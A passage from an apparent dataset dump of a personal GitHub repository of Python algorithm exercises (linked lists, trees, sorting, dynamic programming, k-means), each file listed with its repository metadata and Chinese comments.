"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/4 20:17\n# @Author : Meng Xiao\n'''\n给定一个链表,翻转该链表从m到n的位置。要求直接翻转而非申请新空间。\n如:给定1→2→3→4→5,m=2,n=4,返回1→4→3→2→5。\n假定给出的参数满足:1≤m≤n≤链表长度。\n'''\n\nclass ListNode:\n val = None\n next = None\n\n# 创建带头结点的链表\ndef createLinkList(linklist_str):\n if len(linklist_str) <= 0:\n return None\n linkList = ListNode()\n pNode = linkList\n # 尾插法\n for x in linklist_str:\n node = ListNode()\n node.val = x\n pNode.next = node\n pNode = pNode.next\n return linkList\n\n# 打印链表\ndef printLinkList(linklist):\n if linklist == None:\n print('None')\n return\n s = ''\n node = linklist.next\n while node != None:\n s = s + str(node.val)\n node = node.next\n print(s)\n\n# 翻转链表从m到n位置\ndef reverseLinkList(linklist, m, n):\n '''\n 先找到第m个元素, 然后把链表中的第n个元素添加到它前面,重复执行n-m次\n '''\n # 找到第m个节点的前个节点\n preMNode = linklist\n for i in range(m-1):\n preMNode = preMNode.next\n\n for i in range(n-m):\n preNNode = linklist\n # 找到第n个节点的前节点\n for j in range(n-1):\n preNNode = preNNode.next\n nNode = preNNode.next #第n个节点\n preNNode.next = preNNode.next.next\n nNode.next = preMNode.next\n preMNode.next = nNode\n preMNode = preMNode.next\n printLinkList(linklist)\n\nif __name__ == '__main__':\n s = '123456'\n linklist = createLinkList(s)\n printLinkList(linklist)\n reverseLinkList(linklist,2,5)"
},
{
"alpha_fraction": 0.46136102080345154,
"alphanum_fraction": 0.4913494884967804,
"avg_line_length": 25.24242401123047,
"blob_id": "9e5d964c011eaffb97f91a67e54b6c38e2006223",
"content_id": "b04e58c4cbb84c7c4ccabd02289e53b4bb872b22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 871,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 33,
"path": "/快排思想找中位数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/23 下午5:28\n# @Author : Meng Xiao\n\nclass Solution:\n\n def midNumber(self, alist, left, right):\n if left >= right:\n return alist[left]\n key = alist[left]\n low = left\n high = right\n mid = (len(alist) - 1) // 2\n while left < right:\n while left < right and alist[right] >= key:\n right -= 1\n alist[left] = alist[right]\n while left < right and alist[left] <= key:\n left += 1\n alist[right] = alist[left]\n alist[right] = key\n if right == mid:\n\n return key\n elif right < mid:\n\n return self.midNumber(alist, left+1, high)\n else:\n return self.midNumber(alist, low, left-1)\n\ns = Solution()\noutput = s.midNumber([1,1,1,3,5,4,6], 0, 6)\nprint(output)\n\n"
},
{
"alpha_fraction": 0.37457627058029175,
"alphanum_fraction": 0.4372881352901459,
"avg_line_length": 35.9375,
"blob_id": "dbca534ddc444f70b701f595a762e879f42549a8",
"content_id": "473e2938a04a515a4a95ced3a2173a964c40eb34",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 16,
"path": "/leetcode-43字符串相乘.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/6/26 19:59\n# @Author : Meng Xiao\nclass Solution:\n def multiply(self, num1: str, num2: str) -> str:\n if num1 == '0' or num2 == '0':\n return '0'\n res = [0] * (len(num1) + len(num2))\n for i, n1 in enumerate(reversed(num1)):\n for j, n2 in enumerate(reversed(num2)):\n res[i + j] += int(n1) * int(n2)\n res[i + j + 1] += res[i + j] // 10\n res[i + j] %= 10\n while len(res) > 1 and res[-1] == 0:\n res.pop()\n return ''.join(map(str, res[::-1]))"
},
{
"alpha_fraction": 0.5681592226028442,
"alphanum_fraction": 0.5870646834373474,
"avg_line_length": 20.869565963745117,
"blob_id": "7cf0f4125c4e3870b7ffa0e5285b889f04a3e2c8",
"content_id": "fff6d1c962b5f1e01ccf3bf836b123337b6410b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1009,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 46,
"path": "/二叉树的镜像.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/9 下午2:52\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def mirrorRecursively(self, pRoot):\n if pRoot is None:\n return\n if pRoot.left is None and pRoot.right is None:\n return pRoot\n pTemp = pRoot.left\n pRoot.left = pRoot.right\n pRoot.right = pTemp\n\n self.mirrorRecursively(pRoot.left)\n self.mirrorRecursively(pRoot.right)\n return pRoot\n\n def printTree(self, pRoot):\n if pRoot is None:\n return\n print(pRoot.val)\n self.printTree(pRoot.left)\n self.printTree(pRoot.right)\na = TreeNode(8)\nb = TreeNode(6)\nc = TreeNode(10)\nd = TreeNode(5)\ne = TreeNode(7)\nf = TreeNode(9)\ng = TreeNode(11)\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.left = f\nc.right = g\n\ns = Solution()\nprint(s.printTree(a))\ns.mirrorRecursively(a)\nprint(s.printTree(a))"
},
{
"alpha_fraction": 0.4510703384876251,
"alphanum_fraction": 0.4816513657569885,
"avg_line_length": 26.25,
"blob_id": "94bb3af9a1e4af9cd0c117c638917591906f4ff8",
"content_id": "ee6a7930f155a38bfb95d599cebdfa4db0ee444c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 658,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 24,
"path": "/数值的整数次方.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/30 下午3:10\n# @Author : Meng Xiao\nclass Solution:\n def Power(self, base, exponent):\n try:\n ret = self.power_value(base, abs(exponent))\n if exponent < 0:\n ret = 1.0 / ret\n except ZeroDivisionError:\n print('Error: base is zero')\n else:\n return ret\n\n def power_value(self, base, exponent):\n if exponent == 0:\n return 1\n if exponent == 1:\n return base\n ret = self.power_value(base, exponent >> 1)\n ret *= ret\n if exponent & 1 == 1:\n ret *= base\n return ret\n"
},
{
"alpha_fraction": 0.4600326120853424,
"alphanum_fraction": 0.4796084761619568,
"avg_line_length": 24.54166603088379,
"blob_id": "39a3369e6852a9837cc0f1e14bda28f5100aa5f3",
"content_id": "a76d8bbb581ac592e245798d0492957c3f3c690e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 617,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 24,
"path": "/链表中倒数第k个节点.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/2 下午4:20\n# @Author : Meng Xiao\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def FindKthToTail(self, head, k):\n if head == None or k <= 0:\n return None\n pAhead = head\n pBhead = None\n for i in range(k-1):\n if pAhead.next != None:\n pAhead = pAhead.next\n else:\n return None\n pBhead = head\n while pAhead.next != None:\n pAhead = pAhead.next\n pBhead = pBhead.next\n return pBhead\n"
},
{
"alpha_fraction": 0.5215053558349609,
"alphanum_fraction": 0.5573476552963257,
"avg_line_length": 26.950000762939453,
"blob_id": "28e1b6a61ace405e41f763d855ae41b6de3ea6d9",
"content_id": "eb550b5e042aeb9ecaab226990c1fa752c2f1b5e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 730,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 20,
"path": "/leetcode-14 最长公共前缀.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/5/14 22:02\n# @Author : Meng Xiao\n\nclass Solution(object):\n '''\n 首先 ,最长公共前缀,长度不可能大于strs[0],只要strs中存在比当前长度i更短的string,\n 立刻返回上一轮LCP,即strs[0][:i]\n只要strs中存在当前index字符与LCP该index不相同的字符串,立刻返回上一轮LCP,即strs[0][:i]\n如果一直没返回,说明strs[0]本身就是LCP,返回它\n '''\n def longestCommonPrefix(self, strs):\n\n if not strs:\n return ''\n for i in range(len(strs[0])):\n for str in strs:\n if len(str) <= i or strs[0][i] != str[i]:\n return strs[0][:i]\n return strs[0]"
},
{
"alpha_fraction": 0.4736842215061188,
"alphanum_fraction": 0.4894736707210541,
"avg_line_length": 29.3799991607666,
"blob_id": "96713658248b1a7cffbe2d4fc6feb047f27ad5fe",
"content_id": "29e360ef3ac6f6e1e818f11832d4afddac363da9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1566,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 50,
"path": "/leetcode-207课程表.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/21 下午11:59\n# @Author : Meng Xiao\n\n#左边依赖右边\nclass Solution:\n def canFinish(self, numCourses, prerequisites):\n indegrees = [0 for _ in range(numCourses)] # 入度\n adjacency = [[] for _ in range(numCourses)] # 邻接表\n queue = []\n for cur, pre in prerequisites:\n indegrees[cur] += 1\n adjacency[pre].append(cur)\n # 取出入度为0的课程\n for i in range(len(indegrees)):\n if not indegrees[i]:\n queue.append(i)\n # BFS\n while queue:\n pre = queue.pop(0)\n numCourses -= 1\n for cur in adjacency[pre]:\n indegrees[cur] -= 1\n if not indegrees[cur]:\n queue.append(cur)\n return not numCourses\n\n\n # dfs做法\n def canFinish1(self, numCourses, prerequisites):\n def dfs(i, adjacency, flags):\n if flags[i] == -1:\n return True\n if flags[i] == 1:\n return False\n flags[i] = 1\n for j in adjacency[i]:\n if not dfs(j, adjacency, flags):\n return False\n flags[i] = -1\n return True\n\n flags = [0 for _ in range(numCourses)]\n adjacency = [[] for _ in range(numCourses)]\n for cur, pre in prerequisites:\n adjacency[pre].append(cur)\n for i in range(numCourses):\n if not dfs(i, adjacency, flags):\n return False\n return True\n\n"
},
{
"alpha_fraction": 0.4366319477558136,
"alphanum_fraction": 0.4939236044883728,
"avg_line_length": 18.21666717529297,
"blob_id": "afabdda95123571d4a1282ab87af46115ade2714",
"content_id": "e49a45775e362f3be4b0dc2a239df1a1f291d3dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1404,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 60,
"path": "/根号n.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/22 21:05\n# @Author : Meng Xiao\n'''\n求解根号n,\n'''\n\n# 二分法\ndef mySqrt1(x):\n if x <= 0:\n return 0\n min_F = 0.001\n begin = float(0)\n end = x / 2 + 1\n mid = begin + (end-begin) / 2\n while (end-begin) > min_F:\n if (x-mid*mid) > min_F:\n begin = mid + min_F\n elif (mid*mid-x) > min_F:\n end = mid - min_F\n elif abs(x-mid*mid) < min_F:\n break\n mid = begin + (end-begin) / 2\n print(x-mid*mid)\n return mid\n\n\n\n\n# 梯度下降法\ndef mySqrt2(x):\n if x <= 0:\n return 0\n lr = 0.001 # 学习率\n cur = 1\n for i in range(10000):\n tmp = 4 * cur * (cur*cur-x)\n cur -= lr * tmp\n return cur\n\n\n# 牛顿法\n'''\n x^2 = a的解,也就是函数f(x) = x^2 – a与x轴的交点。\n 可以在x轴上先任选一点x0,则点(x0, f(x0))在f(x)上的切线,\n 与x轴的交点为x1,它们满足切线的方程:f(x0)=(x0-x1)f’(x0),\n 可得x1更接近最终的结果,解方程得到:x1 = (x0 + (a/x0))/2。\n 以x1为新的x0,按照切线的方法依次迭代下去,最终求得符合精确度要求的结果值。\n'''\ndef mySqrt3(x):\n if x <= 0:\n return 0\n res = x\n last_res = 0\n min_F = 0.001\n while abs(res-last_res) > min_F:\n last_res = res\n res = (res+x/res)/2\n return res\nprint(mySqrt1(8))"
},
{
"alpha_fraction": 0.485836923122406,
"alphanum_fraction": 0.501287579536438,
"avg_line_length": 21,
"blob_id": "26d7c6847f23d53a9cf5298926afba34f08e0e24",
"content_id": "6b6d434221c707a8f50e4e02a1e578b5d8165d4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1169,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 53,
"path": "/链表环的入口.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/2 下午4:51\n# @Author : Meng Xiao\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\nclass Solution:\n def EntryNodeOfLoop(self, pHead):\n meetNode = self.MeetNode(pHead)\n if not meetNode:\n return None\n loop = 1\n flag = meetNode\n while flag.next != meetNode:\n loop += 1\n flag = flag.next\n fast = pHead\n for i in range(loop):\n fast = fast.next\n slow = pHead\n while fast != slow:\n fast = fast.next\n slow = slow.next\n return fast\n\n def MeetNode(self, head):\n if not head:\n return None\n slow = head.next\n if slow == None:\n return None\n fast = slow.next\n while fast:\n if slow == fast:\n return slow\n slow = slow.next\n fast = fast.next.next\n\nx = ListNode(1)\ny = ListNode(2)\nz = ListNode(3)\nf = ListNode(4)\nw = ListNode(5)\nu = ListNode(6)\nx.next = y\ny.next = z\nz.next = f\nf.next = w\nw.next = u\nu.next = z\ns = Solution()\nprint(s.EntryNodeOfLoop(x).val)"
},
{
"alpha_fraction": 0.5411764979362488,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 28.799999237060547,
"blob_id": "8bd7b3b9e981b0a72e6519ab0a5f370bde29c878",
"content_id": "e7a9d2f02e385a9ff2099d50c2fd2ebb513777cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 595,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 20,
"path": "/leetcode-124二叉树中最大路径和.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/31 21:35\n# @Author : Meng Xiao\n\nclass Solution:\n def maxPathSum(self, root: TreeNode) -> int:\n self.global_max = root.val if root else 0\n self.findmax(root)\n return self.global_max\n\n def findmax(self, node):\n if not node:\n return 0\n left = self.findmax(node.left)\n left = left if left > 0 else 0\n right = self.findmax(node.right)\n right = right if right > 0 else 0\n self.global_max = max(node.val + left + right, self.global_max)\n\n return max(left, right) + node.val"
},
{
"alpha_fraction": 0.4938044846057892,
"alphanum_fraction": 0.5057365894317627,
"avg_line_length": 24.045976638793945,
"blob_id": "c5b353ae1d2a4014eea212cb2289a11a23f53ac7",
"content_id": "4672cf73f4f23148eee8ac5b44e70511b35b7e90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2399,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 87,
"path": "/反转链表.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/4 下午3:45\n# @Author : Meng Xiao\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # 就地逆序\n def reversed1(self, pHead):\n if pHead == None or pHead.next == None:\n return pHead\n pre = None # 前驱节点\n cur = None # 当前节点\n next = None # 后继节点\n cur = pHead.next\n next = cur.next\n cur.next = None\n pre = cur\n cur = next\n # 将当前遍历到的节点cur指向其前驱节点\n while cur.next != None:\n next = cur.next\n cur.next = pre\n pre = cur\n cur = next\n # 最后一个节点指向倒数第二个节点\n cur.next = pre\n pHead.next = cur\n return pHead\n\n def reversed2(self, pHead):\n # 插入法 从链表第二个节点开始,把遍历到的节点插入到头结点后面\n if pHead is None or pHead.next is None:\n return pHead\n cur = None # 当前节点\n next = None # 后继节点\n cur = pHead.next.next\n pHead.next.next = None\n while cur is not None:\n next = cur.next\n cur.next = pHead.next\n pHead.next = cur\n cur = next\n return pHead\n\n def reversed3(self, pHead):\n # 递归 不带头结点\n if not pHead or not pHead.next: # 无节点或一个节点 。不需要反转\n return pHead\n else:\n newHead = self.reversed3(pHead.next)\n pHead.next.next = pHead\n pHead.next = None\n return newHead\n\n def printLinkList(self, linklist):\n if linklist == None:\n print('None')\n return\n s = ''\n node = linklist.next\n while node != None:\n s = s + str(node.val)\n node = node.next\n print (s)\n\n def createLinkList(self, linklist_str):\n if len(linklist_str) <= 0:\n return None\n linkList = ListNode(None)\n pNode = linkList\n # 尾插法\n for x in linklist_str:\n node = ListNode(x)\n\n pNode.next = node\n pNode = pNode.next\n return linkList\n\ns = Solution()\nstr1 = '123456'\nlis = s.createLinkList(str1)\nlis1 = s.reversed3(lis)\ns.printLinkList(lis)\ns.printLinkList(lis1)\n"
},
{
"alpha_fraction": 0.43891194462776184,
"alphanum_fraction": 0.458275705575943,
"avg_line_length": 23.636363983154297,
"blob_id": "0507f7e242a952674d5616364d2ebfd4a1ae0276",
"content_id": "066304c17c9b5f53ba8929d6922e3975b4f21158",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2199,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 88,
"path": "/链表的排序(归并、快排).py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/12 10:32\n# @Author : Meng Xiao\n\n'''\n链表的nlogn排序\n'''\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergesort(self, head):\n #归并排序\n if head == None or head.next == None:\n return head\n mid = self.findMid(head)\n l1 = head # split\n l2 = mid.next\n mid.next = None\n l1 = self.mergesort(l1)\n l2 = self.mergesort(l2)\n return self.mergeTwoLists(l1, l2)\n\n def mergeTwoLists(self, l1, l2):\n if l1 == None:\n return l2\n if l2 == None:\n return l1\n dummy = ListNode(-1)\n cur = dummy\n while l1 and l2:\n if l1.val < l2.val:\n cur.next = l1\n l1 = l1.next\n else:\n cur.next = l2\n l2 = l2.next\n cur = cur.next\n if l1: # 兜底\n cur.next = l1\n else:\n cur.next = l2\n return dummy.next\n\n def findMid(self, head):\n if head == None or head.next == None:\n return head\n slow = head\n fast = head\n while fast.next and fast.next.next:\n slow = slow.next\n fast = fast.next.next\n return slow\n\n '''\n 快速排序\n '''\n def quickSort(self, head):\n if head == None or head.next == None:\n return head\n leftH = ListNode(-1)\n resL = leftH\n rightH = ListNode(-1)\n resR = rightH\n pivotNode = head # pivot\n cur = head.next\n while cur != None:\n if cur.val < pivotNode.val:\n leftH.next = cur\n leftH = leftH.next\n else:\n rightH.next = cur\n rightH = rightH.next\n cur = cur.next\n leftH.next = None\n rightH.next = None\n L = self.quickSort(resL.next)\n R = self.quickSort(resR.next)\n pivotNode.next = R\n if L == None:\n return pivotNode\n tmp = L\n while tmp.next != None:\n tmp = tmp.next\n tmp.next = pivotNode\n return L\n\n"
},
{
"alpha_fraction": 0.4542553126811981,
"alphanum_fraction": 0.4936170279979706,
"avg_line_length": 28.40625,
"blob_id": "97552d9e4f2ccb3bf59d37401960d050a6662b97",
"content_id": "fd5013d0c98256ce55db256bc2a38a3a0c7602eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 944,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 32,
"path": "/扑克牌中的顺子.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午9:31\n# @Author : Meng Xiao\nclass Solution:\n def IsContinuous(self, numbers):\n\n if not numbers or len(numbers) == 0:\n return False\n\n transdict = {'A':1,'J':11,'Q':12,'K':13}\n for i in range(len(numbers)):\n if numbers[i] in transdict.keys():\n numbers[i] = transdict[numbers[i]]\n numbers = sorted(numbers)\n num_0 = 0\n num_gap = 0\n\n i = 0\n while i < len(numbers) and numbers[i] == 0:\n num_0 += 1\n i += 1\n front = num_0\n behind = front + 1\n while behind < len(numbers):\n if numbers[front] == numbers[behind]:\n return False\n num_gap += numbers[behind] - numbers[front] - 1\n front = behind\n behind += 1\n return False if num_gap > num_0 else True\ns = Solution()\nprint(s.IsContinuous([1,3,5,4,0]))"
},
{
"alpha_fraction": 0.49676623940467834,
"alphanum_fraction": 0.5093932747840881,
"avg_line_length": 25.185483932495117,
"blob_id": "f5c5ec2b5f7532007738bbf4d474b0c4dd00d7fb",
"content_id": "ffa881b790a4e60cadfedcfe19f2b035d98be2bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3377,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 124,
"path": "/树的遍历(递归+循环).py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/17 下午3:46\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def inorderTraversal1(self, root):\n if not root:\n return []\n return self.inorderTraversal1(root.left) + [root.val] + self.inorderTraversal1(root.right)\n\n def inorderTraversal2(self, root):\n '''\n 规律:当curnode不为None时,每一次循环将curnode入栈,如果curnode不为None,则出栈一个节点并加入res\n '''\n if not root:\n return []\n stack = []\n res = []\n curnode = root\n while stack or curnode:\n if curnode:\n stack.append(curnode)\n curnode = curnode.left\n else:\n curnode = stack.pop()\n res.append(curnode.val)\n curnode = curnode.right\n return res\n\n def preorderTraversal1(self, root):\n if not root:\n return []\n return [root.val] + self.preorderTraversal1(root.left) + self.preorderTraversal1(root.right)\n\n def preorderTraversal2(self, root):\n if not root:\n return []\n curnode = root\n stack = []\n res = []\n while stack or curnode:\n if curnode:\n res.append(curnode.val)\n stack.append(curnode.right)\n curnode = curnode.left\n else:\n curnode = stack.pop()\n return res\n\n def postorderTraversal1(self, root):\n if not root:\n return []\n return self.postorderTraversal1(root.left) + self.postorderTraversal1(root.right) + [root.val]\n\n def postorderTraversal2(self, root):\n if not root:\n return []\n curnode = root\n stack = []\n res = []\n while stack or curnode:\n if curnode:\n res.append(curnode.val)\n stack.append(curnode.left)\n curnode = curnode.right\n else:\n curnode = stack.pop()\n return res[::-1]\n\n '''\n 层序遍历,也叫宽度优先遍历。\n '''\n def levelorderTraversal1(self, root):\n # 递归学要一个参数level ,表示当前节点的层数。\n def helper(node, level):\n if not node:\n return\n else:\n res[level-1].append(node.val)\n if len(res) == level:\n res.append([])\n helper(node.left, level+1)\n helper(node.right, level+1)\n res = [[]]\n helper(root, 1)\n return res[:-1]\n\n def levelorderTraversal2(self, root):\n if not root:\n return []\n res = []\n curnode = root\n queue = [curnode]\n while queue:\n curnode = queue.pop(0)\n res.append(curnode.val)\n if curnode.left:\n queue.append(curnode.left)\n if curnode.right:\n queue.append(curnode.right)\n return res\n\n\ns = Solution()\na = TreeNode(1)\nb = TreeNode(2)\nc = TreeNode(3)\nd = TreeNode(4)\ne = TreeNode(5)\nf = TreeNode(6)\ng = TreeNode(7)\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\ne.left = g\n\nprint(s.levelorderTraversal1(a))\nprint(s.levelorderTraversal2(a))\n"
},
{
"alpha_fraction": 0.39109697937965393,
"alphanum_fraction": 0.4356120824813843,
"avg_line_length": 25.16666603088379,
"blob_id": "0db30ef1f6e8692cf1897a6288db1edf7d537bde",
"content_id": "7fdcf9f940048945d415e1281f28e95bb1da820c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 633,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 24,
"path": "/剪绳子.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/27 下午9:15\n# @Author : Meng Xiao\nclass Solution:\n def cutRecursion(self, length):\n if length < 2:\n return 0\n if length == 2:\n return 1\n if length == 3:\n return 2\n products = [0, 1, 2, 3]\n\n max = 0\n for i in range(4, length+1):\n products.append(None)\n max = 0\n for j in range(1, i//2+1):\n product = products[j] * products[i-j]\n if max < product:\n max = product\n products[i] = max\n\n return products[length]\n\n"
},
{
"alpha_fraction": 0.36409395933151245,
"alphanum_fraction": 0.42617449164390564,
"avg_line_length": 21.11111068725586,
"blob_id": "ee0e16a725f9b3f727d6d20347344435666c7cf9",
"content_id": "7c1b6de0fe6d1371cda842d1a551b992f385d19c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 646,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 27,
"path": "/消消乐.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/5 19:57\n# @Author : Meng Xiao\n\n# 消消乐升级,只要有相同连续数字,全部消除,如1,2,3,3,3,2,3,返回1,3\ndef xiaoxiaole(a):\n stack = []\n i = 0\n lena = len(a)\n while(i<lena):\n flag = False\n while(i<lena and len(stack)>0 and stack[-1] == a[i]):\n if i < len(a)-2 and a[i+1] != a[i+2]:\n i += 1\n flag = True\n if(flag):\n stack.pop()\n else:\n stack.append(a[i])\n i += 1\n\n return stack\n\nif __name__ == \"__main__\":\n a = [1,4,2,2,3,3,2,4,1]\n s = xiaoxiaole(a)\n print(s)"
},
{
"alpha_fraction": 0.37228259444236755,
"alphanum_fraction": 0.43885868787765503,
"avg_line_length": 26.296297073364258,
"blob_id": "2a8c4697b858e1a3d608919d4c6bee119fc8132f",
"content_id": "c730d49b74f12042423ac438d1bb2aefca15dd35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 794,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 27,
"path": "/编辑距离.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/4 上午10:16\n# @Author : Meng Xiao\n'''\n动态规划思想:dp[i][j]表示将字符串A[0:i-1]转变为B[0:j-1]的最小步骤数\n'''\n\nclass Solution:\n def editDistance(self, str1, str2):\n n1, n2 = len(str1), len(str2)\n if n1 == 0:\n return n2\n if n2 == 0:\n return n1\n edit = [[i + j for j in range(n2 + 1)] for i in range(n1 + 1)] # 初始化边界\n\n for i in range(1, n1 + 1):\n for j in range(1, n2 + 1):\n if str1[i-1] == str2[j-1]:\n d = 0\n else:\n d = 1\n edit[i][j] = min(edit[i-1][j]+1, edit[i][j-1]+1, edit[i-1][j-1]+d)\n return edit#\n\ns = Solution()\nprint(s.editDistance('abcf', 'abde'))"
},
{
"alpha_fraction": 0.5006648898124695,
"alphanum_fraction": 0.5272606611251831,
"avg_line_length": 25.36842155456543,
"blob_id": "1dcc523d6fe9606f2ca21b5ce79faefb11215efc",
"content_id": "224c6a1887ac46dd3f763e99c8e275cbe6a45389",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1860,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 57,
"path": "/kmeans.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/9/14 16:36\n# @Author : Meng Xiao\n'''\n算法原理\n(1) 初始随机选取k个中心点;\n(2) 遍历每个样本,选取距离每个样本最近的中心点,归为该类;\n(3) 更新中心点为每类的均值;\n(4) 重复(2)(3)迭代更新,直至误差小到某个值或者到达一定的迭代步数.\n'''\nimport numpy as np\nimport math\ndef kmeans(k):\n m, n = 100, 20 # 构造样本, 100行, 20列\n x = 10 * np.random.random((m, n))\n # 随机选取k个初始中心点\n init_cent_sample = set()\n while len(init_cent_sample) < k:\n init_cent_sample.add(np.random.randint(0, m))\n cent = x[list(init_cent_sample)]\n\n # 记录每个样本的类归属\n cluster_assessment = np.zeros((m, 2)) # [类, 距离]\n\n # 记录每个类的中心点在本次迭代后是否有过改变\n cent_changed = True\n while cent_changed:\n cent_changed = False\n\n for j in range(m):\n min_idx = -1 # 记录每个样本距离最近的类\n min_dist = math.inf # 记录每个样本的最小类距离\n\n for i in range(k):\n d = distance(x[j], cent[i])\n if d < min_dist:\n min_dist = d\n min_idx = i\n\n # 记录是否发生变化\n if min_idx != cluster_assessment[j][0]:\n cluster_assessment[j] = np.array([min_idx, min_dist])\n cent_changed = True\n print(cluster_assessment)\n\n # 更新每个类的中心点:均值\n for i in range(k):\n cent_i_samples = np.where(cluster_assessment[:, 0] == i)\n if len(cent_i_samples) > 0:\n print(cent_i_samples)\n cent[i] = np.mean(x[cent_i_samples], axis=0)\n\n\ndef distance(a, b):\n return math.sqrt(sum(pow(a-b, 2)))\n\nkmeans(10)\n\n"
},
{
"alpha_fraction": 0.3321078419685364,
"alphanum_fraction": 0.3700980246067047,
"avg_line_length": 31.639999389648438,
"blob_id": "a0c0d8b2c8e761c61e75b6afab1dd370793d603e",
"content_id": "e45eefe6709a1811538e7d3c76844bc3f0511399",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 820,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 25,
"path": "/leetcode-394 字符串解码.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
